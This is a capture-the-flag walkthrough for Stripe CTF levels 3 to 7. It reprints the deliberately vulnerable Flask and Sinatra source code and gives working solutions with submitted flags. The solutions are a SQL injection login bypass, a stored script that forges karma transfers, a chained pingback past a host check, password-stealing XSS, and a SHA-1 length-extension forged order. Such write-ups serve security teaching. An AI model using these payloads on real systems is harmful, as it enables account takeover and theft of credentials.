' and 1=0 union all select (select id from users where username='bob'),'d74ff0ee8da3b9806b18c877dbf29bbde50b5bd8e4dad7a3a725000feb82e8f1','' -- enter this as username and "pass" as password

After the fiasco back in Level 0, management has decided to fortify the Secret Safe into an unbreakable solution (kind of like Unbreakable Linux). The resulting product is Secret Vault, which is so secure that it requires human intervention to add new secrets. A beta version has launched with some interesting secrets (including the password to access Level 4); you can check it out at https://level03-1.stripe-ctf.com/user-uajtfcvbxh. As usual, you can fetch the code for the level (and some sample data) via git clone https://level03-1.stripe-ctf.com/user-uajtfcvbxh/level03-code, or you can read the code below. The source of the server, secretvault.py, is:

#!/usr/bin/env python
#
# Welcome to the Secret Safe!
#
# - users/users.db stores authentication info with the schema:
#
# CREATE TABLE users (
#   id VARCHAR(255) PRIMARY KEY AUTOINCREMENT,
#   username VARCHAR(255),
#   password_hash VARCHAR(255),
#   salt VARCHAR(255)
# );
#
# - For extra security, the dictionary of secrets lives
#   data/secrets.json (so a compromise of the database won't
#   compromise the secrets themselves)

import flask
import hashlib
import json
import logging
import os
import sqlite3
import subprocess
import sys
from werkzeug import debug

# Generate test data when running locally
data_dir = os.path.join(os.path.dirname(__file__), 'data')
if not os.path.exists(data_dir):
    import generate_data
    os.mkdir(data_dir)
    generate_data.main(data_dir, 'dummy-password', 'dummy-proof', 'dummy-plans')

secrets = json.load(open(os.path.join(data_dir, 'secrets.json')))
index_html = open('index.html').read()
app = flask.Flask(__name__)

# Turn on backtraces, but turn off code execution (that'd be an easy level!)
app.config['PROPAGATE_EXCEPTIONS'] = True
app.wsgi_app = debug.DebuggedApplication(app.wsgi_app, evalex=False)

app.logger.addHandler(logging.StreamHandler(sys.stderr))
# use persistent entropy file for secret_key
app.secret_key = open(os.path.join(data_dir, 'entropy.dat')).read()

# Allow setting url_root if needed
try:
    from local_settings import url_root
except ImportError:
    pass

def absolute_url(path):
    return url_root + path

@app.route('/')
def index():
    try:
        user_id = flask.session['user_id']
    except KeyError:
        return index_html
    else:
        secret = secrets[str(user_id)]
        return (u'Welcome back! Your secret is: "{0}"'.format(secret) +
                u' (Log out)\n')

@app.route('/logout')
def logout():
    flask.session.pop('user_id', None)
    return flask.redirect(absolute_url('/'))

@app.route('/login', methods=['POST'])
def login():
    username = flask.request.form.get('username')
    password = flask.request.form.get('password')

    if not username:
        return "Must provide username\n"

    if not password:
        return "Must provide password\n"

    conn = sqlite3.connect(os.path.join(data_dir, 'users.db'))
    cursor = conn.cursor()

    query = """SELECT id, password_hash, salt FROM users
               WHERE username = '{0}' LIMIT 1""".format(username)
    cursor.execute(query)

    res = cursor.fetchone()
    if not res:
        return "There's no such user {0}!\n".format(username)
    user_id, password_hash, salt = res

    calculated_hash = hashlib.sha256(password + salt)
    if calculated_hash.hexdigest() != password_hash:
        return "That's not the password for {0}!\n".format(username)

    flask.session['user_id'] = user_id
    return flask.redirect(absolute_url('/'))

if __name__ == '__main__':
    # In development: app.run(debug=True)
    app.run()

And here’s index.html, the HTML file it’s serving:

Welcome to the Secret Safe, a place to guard your most precious secrets! To retreive your secrets, log in below.

The current users of the system store the following secrets:

bob: Stores the password to access level 04
eve: Stores the proof that P = NP
mallory: Stores the plans to a perpetual motion machine

You should use it too! Contact us to request a beta invite.

Solution This is a Python (Flask) powered webserver. You need to read secrets of bob here. Authentication mechanism is good, as it has hashing and salts. Line 86 and 87 do a Query which is not prepared statements, so you can simply inject it. It looks like Prepared Statements but it’s actually C style format string. Now line 93-97 checks for validity of password. First it is salted (user_entered_password+salt), then SHA256 hash is applied on it, converted to hex digits, and compared against the hexed password which is stored in the database. All we need to do, is make this query return user_id of bob, SHA256 of foo, and empty string as salt. Then we could easily provide the password foo and expect it to be correct for bob! A simple union bypassing will do that. First go online and calculate SHA256(“pass”) using zillions of free online tools, then input password as pass and username as the following injection:

‘ and 1=0 union all select (select id from users where username=’bob’), ‘d74ff0ee8da3b9806b18c877dbf29bbde50b5bd8e4dad7a3a725000feb82e8f1′,” –

The above text is a single-line one. It makes the whole query become:

SELECT id, password_hash, salt FROM users
               WHERE username = '{0}' and 1=0 union all select (select id from users where username='bob'),'d74ff0ee8da3b9806b18c877dbf29bbde50b5bd8e4dad7a3a725000feb82e8f1','' -- ' LIMIT 1

Since the first select returns nothing (due to AND 1=0 condition), union jumps off and the second query’s result is returned as the whole result set. The second query returns bob_user_id,SHA256(‘pass’),empty_slat respectively. The — part makes sure that everything that comes after our injection is commented and has no effect (will not cause SQL error). Now you are logged in as bob, and you can simply view his secret.

Challenge 4 – Simple CSRF

You completed this level in 1182.214 seconds. The password wasXtoqkPHnaM. The solution you submitted was:

create base user abx create a user with this pass: var x=document.forms[0]; x.to.value='abx'; x.amount.value='1'; x.submit(); send karma to fountain with that one, wait one minute. login to abx

The Karma Trader is the world’s best way to reward people for good deeds: https://level04-4.stripe-ctf.com/user-bivlappzeh. You can sign up for an account, and start transferring karma to people who you think are doing good in the world. In order to ensure you’re transferring karma only to good people, transferring karma to a user will also reveal your password to him or her. The very active user karma_fountain has infinite karma, making it a ripe account to obtain (no one will notice a few extra karma trades here and there). The password for karma_fountain‘s account will give you access to Level 5. You can obtain the full, runnable source for the Karma Trader fromgit clone https://level04-4.stripe-ctf.com/user-bivlappzeh/level04-code. We’ve included the most important files below. The contents of srv.rb:

#!/usr/bin/env ruby
require 'yaml'
require 'set'

require 'rubygems'
require 'bundler/setup'

require 'sequel'
require 'sinatra'

module KarmaTrader
  PASSWORD = File.read('password.txt').strip
  STARTING_KARMA = 500
  KARMA_FOUNTAIN = 'karma_fountain'

  # Only needed in production
  URL_ROOT = File.read('url_root.txt').strip rescue ''

  module DB
    def self.db_file
      'karma.db'
    end

    def self.conn
      @conn ||= Sequel.sqlite(db_file)
    end

    def self.init
      return if File.exists?(db_file)
      File.umask(0066)

      conn.create_table(:users) do
        primary_key :id
        String :username
        String :password
        Integer :karma
        Time :last_active
      end

      conn.create_table(:transfers) do
        primary_id :id
        String :from
        String :to
        Integer :amount
      end

      # Karma Fountain has infinite karma, so just set it to -1
      conn[:users].insert(
        :username => KarmaTrader::KARMA_FOUNTAIN,
        :password => KarmaTrader::PASSWORD,
        :karma => -1,
        :last_active => Time.now.utc
        )
    end
  end

  class KarmaSrv < Sinatra::Base
    set :environment, :production
    enable :sessions

    # Use persistent entropy file
    entropy_file = 'entropy.dat'
    unless File.exists?(entropy_file)
      File.open(entropy_file, 'w') do |f|
        f.write(OpenSSL::Random.random_bytes(24))
      end
    end
    set :session_secret, File.read(entropy_file)

    helpers do
      def absolute_url(path)
        KarmaTrader::URL_ROOT + path
      end
    end

    # Hack to make this work with a URL root
    def redirect(url)
      super(absolute_url(url))
    end

    def die(msg, view)
      @error = msg
      halt(erb(view))
    end

    before do
      refresh_state
      update_last_active
    end

    def refresh_state
      @user = logged_in_user
      @transfers = transfers_for_user
      @trusts_me = trusts_me
      @registered_users = registered_users
    end

    def update_last_active
      return unless @user
      DB.conn[:users].where(:username => @user[:username]).
        update(:last_active => Time.now.utc)
    end

    def logged_in_user
      return unless username = session[:user]
      DB.conn[:users][:username => username]
    end

    def transfers_for_user
      return [] unless @user

      DB.conn[:transfers].where(
        Sequel.or(:from => @user[:username], :to => @user[:username])
        )
    end

    def trusts_me
      trusts_me = Set.new
      return trusts_me unless @user

      # Get all the users who have transferred credits to me
      DB.conn[:transfers].where(:to => @user[:username]).
        join(:users, :username => :from).each do |result|
        trusts_me.add(result[:username])
      end

      trusts_me
    end

    def registered_users
      KarmaTrader::DB.conn[:users].reverse_order(:id)
    end

    # KARMA_FOUNTAIN gets all the karma it wants. (Part of why getting
    # its password would be so great...)
    def user_has_infinite_karma?
      @user[:username] == KARMA_FOUNTAIN
    end

    get '/' do
      if @user
        erb :home
      else
        erb :login
      end
    end

    get '/register' do
      erb :register
    end

    post '/register' do
      username = params[:username]
      password = params[:password]
      unless username && password
        die("Please specify both a username and a password.", :register)
      end

      unless username =~ /^\w+$/
        die("Invalid username. Usernames must match /^\w+$/", :register)
      end

      unless DB.conn[:users].where(:username => username).count == 0
        die("This username is already registered. Try another one.",
            :register)
      end

      DB.conn[:users].insert(
        :username => username,
        :password => password,
        :karma => STARTING_KARMA,
        :last_active => Time.now.utc
        )
      session[:user] = username
      redirect '/'
    end

    get '/login' do
      redirect '/'
    end

    post '/login' do
      username = params[:username]
      password = params[:password]
      user = DB.conn[:users][:username => username, :password => password]
      unless user
        die('Could not authenticate. Perhaps you meant to register a new' \
            ' account? (See link below.)', :login)
      end

      session[:user] = user[:username]
      redirect '/'
    end

    get '/transfer' do
      redirect '/'
    end

    post '/transfer' do
      redirect '/' unless @user

      from = @user[:username]
      to = params[:to]
      amount = params[:amount]

      die("Please fill out all the fields.", :home) unless amount && to
      amount = amount.to_i
      die("Invalid amount specified.", :home) if amount <= 0
      die("You cannot send yourself karma!", :home) if to == from
      unless DB.conn[:users][:username => to]
        die("No user with username #{to.inspect} found.", :home)
      end

      unless user_has_infinite_karma?
        if @user[:karma] < amount
          die("You only have #{@user[:karma]} karma left.", :home)
        end
      end

      DB.conn[:transfers].insert(:from => from, :to => to, :amount => amount)
      DB.conn[:users].where(:username=>from).update(:karma => :karma - amount)
      DB.conn[:users].where(:username=>to).update(:karma => :karma + amount)

      refresh_state
      @success = "You successfully transfered #{amount} karma to" +
                 " #{to.inspect}."
      erb :home
    end

    get '/logout' do
      session.clear
      redirect '/'
    end
  end
end

def main
  KarmaTrader::DB.init
  KarmaTrader::KarmaSrv.run!
end

if $0 == __FILE__
  main
  exit(0)
end

The contents of views/home.erb:

Welcome to Karma Trader!

Home
You are logged in as <%= @user[:username] %>.

Transfer karma

  You have <%= @user[:karma] %> karma at the moment. Transfer
  karma to people who have done good deeds and you think will keep
  doing good deeds in the future.



  Note that transferring karma to someone will reveal your
  password to them, which will hopefully incentivize you to only
  give karma to people you really trust.



  If you're anything like karma_fountain, you'll find
  yourself logging in every minute to see what new and exciting
  developments are afoot on the platform. (Though no need to be as paranoid as
  karma_fountain and firewall your outbound network connections
  so you can only make connections to the Karma Trader server itself.)


See below for a list of all registered usernames.

  To: 
  Amount of karma: 
  


Past transfers

  <% @transfers.each do |transfer| %>
  
  <% end %>

  
    From
    To
    Amount
  

    <%= transfer[:from] %>
    <%= transfer[:to] %>
    <%= transfer[:amount] %>
  

 Registered Users 

  <% @registered_users.each do |user| %>
  <% last_active = user[:last_active].strftime('%H:%M:%S UTC') %>
  <% if @trusts_me.include?(user[:username]) %>
  
    <%= user[:username] %>
    (password: <%= user[:password] %>, last active <%= last_active %>)
  
  <% elsif user[:username] == @user[:username] %>
  
    <%= user[:username] %>
    (you, last active <%= last_active %>)
  
  <% else %>
  
    <%= user[:username] %>
    (password: [hasn't yet transferred karma to you],
    last active <%= last_active %>)
  
  <% end %>
  <% end %>


Log out

The contents of views/login.erb:

Welcome to Karma Trader, the best way to reward people for good deeds!

Login

Don't have an account? Register now!

The contents of views/register.erb:

Welcome to Karma Trader, the best way to reward people for good deeds!

Register

Already have an account? Log in now!

The contents of views/layout.erb:



  
    Karma Trader
    
  
  
<% if @error %>
  Error: <%= @error %>
<% end %>
<% if @success %>
  Success: <%= @success %>
<% end %>

<%= yield %>

Solution Well this one’s pretty easy. The code is in Ruby and based on Sinatra framework. It’s an application where different users can send each other Karma. The application uses a mechanism to ensure karma is traded legally, by showing A’s password to B as soon as A sends B karma; this way only good trusted people will receive karma. Now there’s an automated user (karma_fountain) which has unlimited karma. You have to obtain his/her password as the flag. Obviously to get his password, he has to send you karma. Since you don’t have his password, you can’t legally send karma from him to yourself, so you have to do some forged requests (hence CSRF). The application interface is pretty simple, a few lines of text comes first, then a form to send karma to someone, having fields amount and to. Whomever you send karma to, will have your password. Then there’s a table listing all transfers you have made to others and others have made to you (just for clarification, we don’t actually need this one.) Finally there’s a list of all users in the game, with their passwords if they have sent you karma. This last section is what we can change and what karma_fountain is bound to see. We have to put our forgery script in here somehow, which is the following script assuming our username is abx:

We can put all these four lines into a single line, I have separated them here for the sake of readability. The first line assigns variable x to the first form in the page (which is the one for sending karma to other people). The second line sets its to field to my username, the third one sets some karma amount. The forth line submits the form. If we could get karma_fountain to somehow run this Javascript code unknowingly, we would have his password. Now first I thought of creating another user with this script as his username, but that was failed since only alphanums are allowed in usernames. Then I understood that I could set this script as the new user’s password, and then send some karma from him to karma_fountain so that it would see (have run) this script on his page. Thus I created a user name screwer with password of the above script (in a single line). Logged in and sent some karma to karma_fountain. Then I logged out and back in as abx. Sat there for a minute or two (to let karma_fountain check his page) and refreshed the page. There was the password of karma fountain on the bottom. (You can’t see the password in the following image, you have to browse the webpages source code. The script is being run and it stops the output.)

Challenge 5 – Chain Request Manipulation

You completed this level in 6528.572 seconds. The password wasZEAorpaRyV. The solution you submitted was: I was stuck here for 2 hours only cuz i didnt know default Ruby regex is not multiline, as is in PHP.

Many attempts have been made at creating a federated identity system for the web (see OpenID, for example). However, none of them have been successful. Until today. The DomainAuthenticator is based off a novel protocol for establishing identities. To authenticate to a site, you simply provide it username, password, and pingback URL. The site posts your credentials to the pingback URL, which returns either “AUTHENTICATED” or “DENIED”. If “AUTHENTICATED”, the site considers you signed in as a user for the pingback domain. You can check out the Stripe CTF DomainAuthenticator instance here:https://level05-2.stripe-ctf.com/user-ttjzfipuud. We’ve been using it to distribute the password to access Level 6. If you could only somehow authenticate as a user of a level05 machine… To avoid nefarious exploits, the machine hosting the DomainAuthenticator has very locked down network access. It can only make outbound requests to other stripe-ctf.com servers. Though, you’ve heard that someone forgot to internally firewall off the high ports from the Level 2 server. Interesting in setting up your own DomainAuthenticator? You can grab the source from git clone https://level05-2.stripe-ctf.com/user-ttjzfipuud/level05-code, or by reading on below. The contents of srv.rb:

#!/usr/bin/env ruby
require 'rubygems'
require 'bundler/setup'

require 'logger'
require 'uri'

require 'restclient'
require 'sinatra'

$log = Logger.new(STDERR)
$log.level = Logger::INFO

module DomainAuthenticator
  class DomainAuthenticatorSrv < Sinatra::Base
    set :environment, :production

    # Run with the production file on the server
    if File.exists?('production')
      PASSWORD_HOSTS = /^level05-\d+\.stripe-ctf\.com$/
      ALLOWED_HOSTS = /\.stripe-ctf\.com$/
    else
      PASSWORD_HOSTS = /^localhost$/
      ALLOWED_HOSTS = //
    end
    PASSWORD = File.read('password.txt').strip
    enable :sessions

    # Use persistent entropy file
    entropy_file = 'entropy.dat'
    unless File.exists?(entropy_file)
      File.open(entropy_file, 'w') do |f|
        f.write(OpenSSL::Random.random_bytes(24))
      end
    end
    set :session_secret, File.read(entropy_file)

    get '/*' do
      output = <
  Welcome to the Domain Authenticator. Please authenticate as a user from
  your domain of choice.



Pingback URL: 
Username: 
Password: 


EOF

      user = session[:auth_user]
      host = session[:auth_host]
      if user && host
        output += " You are authenticated as #{user}@#{host}. "
        if host =~ PASSWORD_HOSTS
          output += " Since you're a user of a password host and all,"
          output += " you deserve to know this password: #{PASSWORD} "
        end
      end

      output
    end

    post '/*' do
      pingback = params[:pingback]
      username = params[:username]
      password = params[:password]

      pingback = "http://#{pingback}" unless pingback.include?('://')

      host = URI.parse(pingback).host
      unless host =~ ALLOWED_HOSTS
        return "Host not allowed: #{host}" \
               " (allowed authentication hosts are #{ALLOWED_HOSTS.inspect})"
      end

      begin
        body = perform_authenticate(pingback, username, password)
      rescue StandardError => e
        return "An unknown error occurred while requesting #{pingback}: #{e}"
      end

      if authenticated?(body)
        session[:auth_user] = username
        session[:auth_host] = host
        return "Remote server responded with: #{body}." \
               " Authenticated as #{username}@#{host}!"
      else
        session[:auth_user] = nil
        session[:auth_host] = nil
        sleep(1) # prevent abuse
        return "Remote server responded with: #{body}." \
               " Unable to authenticate as #{username}@#{host}."
      end
    end

    def perform_authenticate(url, username, password)
      $log.info("Sending request to #{url}")
      response = RestClient.post(url, {:password => password,
                                       :username => username})
      body = response.body

      $log.info("Server responded with: #{body}")
      body
    end

    def authenticated?(body)
      body =~ /[^\w]AUTHENTICATED[^\w]*$/
    end
  end
end

def main
  DomainAuthenticator::DomainAuthenticatorSrv.run!
end

if $0 == __FILE__
  main
  exit(0)
end

Solution We have to do two steps here, first is to get authenticated, second is to get authenticated from the origin. This is a somewhat hard and nasty challenge. This one is also Ruby/Sinatra based. The application form looks like this: You have to provide it with some pingback URL that outputs .AUTHENTICATED. when provided with username and password of this form as inputs. Only if this pingback URL is hosted on stripe-ctf.com, it will be accepted (Line 21 ALLOWED_HOSTS). This part is pretty easy, just upload another PHP file on Challenge 2′s upload section which outputs “.AUTHENTICATED.” and provide it as the pingback URL here. This will get you authenticated since the Regular Expression on line 110 requires One Non-Alphanumeric char at both ends of the word AUTHENTICATED. Unfortunately, your host (level02-2.stripe-ctf.com) is not in KNOWN_HOSTS (level05-2.stripe-ctf.com) so the script on line 57 won’t show you the password. So you have to provide some pingback on level05 server, but it doesn’t have any LFI flaws. It doesn’t have anything apart from the page shown in the picture, so it must be there somewhere. Taking note of the lines 67-70 shows that Sinatra (the Ruby web framework powering this challenge) does not separate GET and POST arguments. It is a well known flaw and exists in some Java installations as well. This means that we don’t have to provide pingback, username and password as POST parameters, we could easily use a GET one to send them. So what if the pingback was this:

https://level05-2.stripe-ctf.com/user-ttjzfipuud?pingback=https://level02-3.stripe-ctf.com/user-shjuxdnipi/uploads/authenticatede.php

What would this do? It would make the application send a pingback to level05 server, asking if we are authenticated. Level05 server would chain this pingback to level02 server, to get it’s response as well and output it. Now level02 will provide .AUTHENTICATED. and level05 server would return this, with a few words before and after:

Remote server responded with: .AUTHENTICATED..

Authenticated as username@level02-3.stripe-ctf.com!

This is the output given by the first pingback (level05 server), and is taken as input into the application. Unfortunately, this string would not pass the regex at line 110, because it has alphanumeric characters before AUTHENTICATED.

This step had me stuck there for a couple hours, but then I realized that Ruby regexs operate on single lines, not all the text; i.e the regex checks every line of the output string and if any of them is valid, validates. So I just had to change uploaded PHP script to output \rAUTHENTICATED\r instead of dots, to make this string the input to the application:

Remote server responded with:

AUTHENTICATED

Authenticated as username@level02-3.stripe-ctf.com!

Now this one passes the regex check, and you’re authenticated to see the password.

Challenge 6 – XSS with Bypassing

You completed this level in 4769.346 seconds. The password was'UomQaKdVQhrI". The solution you submitted was: omfg this took a lot and was soo damn hard

After Karma Trader from Level 4 was hit with massive karma inflation (purportedly due to someone flooding the market with massive quantities of karma), the site had to close its doors. All hope was not lost, however, since the technology was acquired by a real up-and-comer, Streamer. Streamer is the self-proclaimed most steamlined way of sharing updates with your friends. You can access your Streamer instance here: https://level06-2.stripe-ctf.com/user-nmqpuylekv The Streamer engineers, realizing that security holes had led to the demise of Karma Trader, have greatly beefed up the security of their application. Which is really too bad, because you’ve learned that the holder of the password to access Level 7, level07-password-holder, is the first Streamer user. As well, level07-password-holder is taking a lot of precautions: his or her computer has no network access besides the Streamer server itself, and his or her password is a complicated mess, including quotes and apostrophes and the like. Fortunately for you, the Streamer engineers have decided to open-source their application so that other people can run their own Streamer instances. You can obtain the source for Streamer at git clone https://level06-2.stripe-ctf.com/user-nmqpuylekv/level06-code. We’ve also included the most important files below. The contents of srv.rb:

#!/usr/bin/env ruby
require 'rubygems'
require 'bundler/setup'

require 'rack/utils'
require 'rack/csrf'
require 'json'
require 'sequel'
require 'sinatra'

module Streamer
  PASSWORD = File.read('password.txt').strip

  # Only needed in production
  URL_ROOT = File.read('url_root.txt').strip rescue ''

  module DB
    def self.db_file
      'streamer.db'
    end

    def self.conn
      @conn ||= Sequel.sqlite(db_file)
    end

    def self.safe_insert(table, key_values)
      key_values.each do |key, value|
        # Just in case people try to exfiltrate
        # level07-password-holder's password
        if value.kind_of?(String) &&
            (value.include?('"') || value.include?("'"))
          raise "Value has unsafe characters"
        end
      end

      conn[table].insert(key_values)
    end

    def self.init
      return if File.exists?(db_file)
      File.umask(0066)

      conn.create_table(:users) do
        primary_key :id
        String :username
        String :password
        Time :last_active
      end

      conn.create_table(:posts) do
        primary_id :id
        String :user
        String :title
        String :body
        Time :time
      end

      conn[:users].insert(:username => 'level07-password-holder',
        :password => Streamer::PASSWORD,
        :last_active => Time.now.utc)

      conn[:posts].insert(:user => 'level07-password-holder',
        :title => 'Hello World',
        :body => "Welcome to Streamer, the most streamlined way of sharing
updates with your friends!

One great feature of Streamer is that no password resets are needed. I, for
example, have a very complicated password (including apostrophes, quotes, you
name it!). But I remember it by clicking my name on the right-hand side and
seeing what my password is.

Note also that Streamer can run entirely within your corporate firewall. My
machine, for example, can only talk directly to the Streamer server itself!",
        :time => Time.now.utc)
    end
  end

  class StreamerSrv < Sinatra::Base
    set :environment, :production
    enable :sessions

    # Use persistent entropy file
    entropy_file = 'entropy.dat'
    unless File.exists?(entropy_file)
      File.open(entropy_file, 'w') do |f|
        f.write(OpenSSL::Random.random_bytes(24))
      end
    end
    set :session_secret, File.read(entropy_file)

    use Rack::Csrf, :raise => true

    helpers do
      def absolute_url(path)
        Streamer::URL_ROOT + path
      end

      # Insert an hidden tag with the anti-CSRF token into your forms.
      def csrf_tag
        Rack::Csrf.csrf_tag(env)
      end

      # Return the anti-CSRF token
      def csrf_token
        Rack::Csrf.csrf_token(env)
      end

      # Return the field name which will be looked for in the requests.
      def csrf_field
        Rack::Csrf.csrf_field
      end

      include Rack::Utils
      alias_method :h, :escape_html
    end

    def redirect(url)
      super(absolute_url(url))
    end

    before do
      @user = logged_in_user
      update_last_active
    end

    def logged_in_user
      if session[:user]
        @username = session[:user]
        @user = DB.conn[:users][:username => @username]
      end
    end

    def update_last_active
      return unless @user
      DB.conn[:users].where(:username => @user[:username]).
        update(:last_active => Time.now.utc)
    end

    def recent_posts
      # Grab the 5 most recent posts
      DB.conn[:posts].reverse_order(:time).limit(5).to_a.reverse
    end

    def registered_users
      DB.conn[:users].reverse_order(:id)
    end

    def die(msg, view)
      @error = msg
      halt(erb(view))
    end

    get '/' do
      if @user
        @registered_users = registered_users
        @posts = recent_posts

        erb :home
      else
        erb :login
      end
    end

    get '/register' do
      erb :register
    end

    post '/register' do
      username = params[:username]
      password = params[:password]
      unless username && password
        die("Please specify both a username and a password.", :register)
      end

      unless DB.conn[:users].where(:username => username).count == 0
        die("This username is already registered. Try another one.",
            :register)
      end

      DB.safe_insert(:users,
        :username => username,
        :password => password,
        :last_active => Time.now.utc
        )
      session[:user] = username
      redirect '/'
    end

    get '/login' do
      redirect '/'
    end

    post '/login' do
      username = params[:username]
      password = params[:password]
      user = DB.conn[:users][:username => username, :password => password]
      unless user
        die('Could not authenticate. Perhaps you meant to register a new' \
            ' account? (See link below.)', :login)
      end

      session[:user] = user[:username]
      redirect '/'
    end

    get '/logout' do
      session.clear
      redirect '/'
    end

    get '/user_info' do
      @password = @user[:password]

      erb :user_info
    end

    before '/ajax/*' do
      halt(403, 'Must be logged in!') unless @user
    end

    get '/ajax/posts' do
      recent_posts.to_json
    end

    post '/ajax/posts' do
      msg = create_post
      resp = {:response => msg}
      resp.to_json
    end

    # Fallback if JS breaks
    get '/posts' do
      redirect '/'
    end

    post '/posts' do
      create_post if @user
      redirect '/'
    end

    def create_post
      post_body = params[:body]
      title = params[:title] || 'untitled'
      if post_body
        DB.safe_insert(:posts,
          :user => @user[:username],
          :title => title,
          :body => post_body,
          :time => Time.now.utc
          )
        'Successfully added the post!'
      else
        'No post body given!'
      end
    end
  end
end

def main
  Streamer::DB.init
  Streamer::StreamerSrv.run!
end

if $0 == __FILE__
  main
  exit(0)
end

The contents of views/home.erb:


  
    Stream of Posts

    
      
      
    

    

    
      <%= csrf_tag %>
      
        
          Title:
          
            
          
        
        
          Content:
          
            Your post here...
          
        
        
          
        
        
          Ready and waiting!
        
      
    

    
  
  
    Users Online
    
      <% @registered_users.each do |user| %>
        
      <% end %>
    
          
            <% if @username == user[:username] %>
              
                
                  <%=h user[:username] %> (me)i
                
              
            <% else %>
              <%=h user[:username] %>
            <% end %>

            


            
              Last active: <%= user[:last_active].strftime('%H:%M:%S UTC') %>

The contents of views/login.erb:


  
    Login

    


    
      Sign into your Streamer account, and instantly start sharing updates
      with your friends. If you don't have an account yet,
      create one now!
    

    


    
      <%= csrf_tag %>

The contents of views/register.erb:


  
    Register for a Streamer account

    


    
      <%= csrf_tag %>
      
        
          Username:
          
            
          
        
        
          Password:

The contents of views/layout.erb:



  
    Streamer
    
    ' />
  
  
    
      
        
          Streamer
          <% if @user %>
            
              Log Out
            
          <% end %>
        
      
    
    
<% if @error %>
  Error: <%= @error %>
<% end %>
<% if @success %>
  Success: <%= @success %>
<% end %>

      <%= yield %>

The contents of views/user_info.erb:


  
    User Information
    
      
        Username:
        <%= @username %>
      
      
        Password:
        <%= @password %>

Solution This one is a pretty nasty one. It requires a considerable XSS encoded to bypass some security checks, like those that are found here and there in Google and Facebook. This app is a something like Twitter, there are a bunch of users registered in there, and everyone can post something. The posts consist of Titles and Bodys. The posting mechanism uses AJAX to make things a little harder.

There is no reset password feature in this, but if you click on your username on the right sidebar, another page pops up showing you your password:

So our Javascript snippet intended for XSS use, would have to first open this page (https://level06-2.stripe-ctf.com/user-nmqpuylekv/user_info) then use a regex to extract the password bit off it. It is stated in the question that password contains special chars such as quotations and apostrophes. Then the XSS snippet would have to post this password as body via AJAX so that other users (hence us) could see it. Since the posting mechanism rejects any message that contains quotations and apostrophes, the snippet would have to escape those characters first and then submit it. Also because of the rejection mechanism, the snippet couldn’t use quotations and apostrophes (which are very common in every programming language) to be able to be posted and run by other users. To make things worse, the messages are not displayed directly on the page by Ruby, instead they are stored as JSON in some Javascript snippet, and then read off one by one with another Javascript snippet and added to page, so what we inject gets inserted in the middle of some Javascript code:

var username = “abx”; var post_data = [{"time":"Fri Aug 24 12:25:13 +0000 2012","title":"Might want to take note","user":"level07-password-holder","id":null,"body":"Anyone want to play tennis?"},{"time":"Fri Aug 24 12:27:34 +0000 2012","title":"FYI","user":"level07-password-holder","id":null,"body":"Why is it so hard to find good juice restaurants?"},{"time":"Fri Aug 24 13:17:37 +0000 2012","title":"Definitely of interest","user":"level07-password-holder","id":null,"body":"Anyone want to play tennis?"},{"time":"Fri Aug 24 13:21:23 +0000 2012","title":"An FYI","user":"level07-password-holder","id":null,"body":"I am hungry"},{"time":"Sun Aug 26 01:24:24 +0000 2012","title":"SAMPLE TITLE","user":"abx","id":null,"body":"SAMPLE BODY"}]; function escapeHTML(val) { return $(‘
’).text(val).html(); } function addPost(item) { var new_element = ‘’ + escapeHTML(item['user']) + ‘
’ + escapeHTML(item['title']) + ‘
’ + escapeHTML(item['body']) + ‘’; $(‘#posts > tbody:last’).prepend(new_element); } for(var i = 0; i < post_data.length; i++) { var item = post_data[i]; addPost(item);

Whatever we enter, goes where you can see SAMPLE BODY now. I crafted the following snippet to do the dirty XSS job for me:

First HTML is parsed, making this lot two separate Javascript tags, then Javascript parser starts, which detects the first part as buggy and non-parsable but runs the second part validly. The // (comment symbol) we used at the end of our snippet is meant to mask the rest of the Javascript so that it has valid syntax. Now you post this snippet, wait a couple minutes, refresh the page, browse the source code and see this:

{“time”:”Sun Aug 26 01:34:19 +0000 2012″,”title”:”#title”,”user”:”level07-password-holder”,”id”:null,”body”:”BOZUomQaKdVQhrIBOY”}

Enjoy the password!

Challenge 7 – Cryptographic Hash Extension

You completed this level in 4968.437 seconds. The password wasehQUKKkphF. The solution you submitted was:

import requests import hashlib import json import sys import urllib body="count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02(&waffle=liege|sig:5fe73d0cbd3b4e82f9b87970041851d232e757cd"; resp= requests.post("https://level07-2.stripe-ctf.com/user-cyusirmzyz/orders",data=body); print resp.text; fAk u for this hard one

Welcome to the penultimate level, Level 7. WaffleCopter is a new service delivering locally-sourced organic waffles hot off of vintage waffle irons straight to your location using quad-rotor GPS-enabled helicopters. The service is modeled after TacoCopter, an innovative and highly successful early contender in the airborne food delivery industry. WaffleCopter is currently being tested in private beta in select locations. Your goal is to order one of the decadent Liège Waffles, offered only to WaffleCopter’s first premium subscribers. Log in to your account at https://level07-2.stripe-ctf.com/user-cyusirmzyz with username ctf and password password. You will find your API credentials after logging in. You can fetch the code for the level via git clone https://level07-2.stripe-ctf.com/user-cyusirmzyz/level07-code, or you can read it below. You may find the sample API client in client.py particularly helpful. The contents of client.py:

#!/usr/bin/env python
import hashlib
import json
import sys
import urllib

import requests

class ClientError(Exception):
    pass

class Client(object):
    def __init__(self, endpoint, user_id, api_secret):
        self.endpoint = endpoint
        self.user_id = user_id
        self.api_secret = api_secret

    def order(self, waffle_name, coords, count=1):
        """Order one or more waffles."""
        params = {'waffle': waffle_name, 'count': count,
                  'lat': coords[0], 'long': coords[1]}
        return self.api_call('/orders', params)

    def api_call(self, path, params, debug_response=False):
        """Make an API call with parameters to the specified path."""
        body = self._make_post(params)
        resp = requests.post(self.endpoint + path, data=body)

        # for debugging
        if debug_response:
            return resp

        # try to decode response as json
        data = None
        if resp.headers['content-type'] == 'application/json':
            try:
                data = json.loads(resp.text)
            except ValueError:
                pass
            else:
                # raise error message if any
                error = data.get('error')
                if error:
                    raise ClientError(error)

        # raise error on non-200 status codes
        resp.raise_for_status()

        # return response data decoded from JSON or just response body
        return data or resp.text

    def _make_post(self, params):
        params['user_id'] = self.user_id
        body = urllib.urlencode(params)

        sig = self._signature(body)
        body += '|sig:' + sig

        return body

    def _signature(self, message):
        h = hashlib.sha1()
        h.update(self.api_secret + message)
        return h.hexdigest()

if __name__ == '__main__':
    if len(sys.argv) != 7:
